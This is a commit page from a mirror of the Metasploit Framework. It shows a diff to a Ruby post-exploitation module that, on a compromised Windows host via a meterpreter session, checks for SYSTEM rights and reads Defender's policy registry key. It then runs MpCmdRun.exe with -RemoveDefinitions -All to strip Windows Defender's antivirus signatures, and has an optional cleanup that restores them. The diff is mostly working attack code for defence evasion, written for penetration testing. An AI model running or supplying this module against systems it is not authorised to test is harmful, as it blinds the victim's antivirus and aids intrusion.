infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add more checks and a cleanup function

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-11-29 10:39:46 -06:00
parent 7f26364d5b
commit 1304f93f1f
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 33 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
modules/post/windows/manage/disable_windowsdefender_signatures.rb
View File

@ -6,6 +6,7 @@
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
@ -24,16 +25,43 @@ class MetasploitModule < Msf::Post
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
))
register_options(
[
OptBool.new('AUTO_CLEANUP', [ true, 'Attempt to return protections after session exit', true ])
])
end
def run
unless is_system?()
print_status("Remove Definitions Windows Defender")
file_path = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"
if exist?(file_path)
cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
#Are we system?
if not is_system?()
fail_with(Failure::NoAccess, "You must be System to run this Module")
end
#Is the binary there?
program_path = session.sys.config.getenv('ProgramFiles')
vprint_status("program_path = #{program_path}")
file_path = program_path + '\Windows Defender\MpCmdRun.exe'
vprint_status("file_path = #{file_path}")
if not exist?(file_path)
fail_with(Failure::NoAccess, "#{file_path} is not Present")
end
#Is defender even enabled?
defender_disable_key = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, "DisableAntiSpyware", REGISTRY_VIEW_NATIVE)
if disable_key_value.nil? || disable_key_value != 1
print_status("Removing All Definitions for Windows Defender")
cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
if cmd.include?('denied')
print_bad("#{cmd}")
else
print_status("#{cmd}")
end
else
fail_with(Failure::BadConfig, "Defender is not Enabled")
end
end
def cleanup
cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -SignatureUpdate")
end
end
0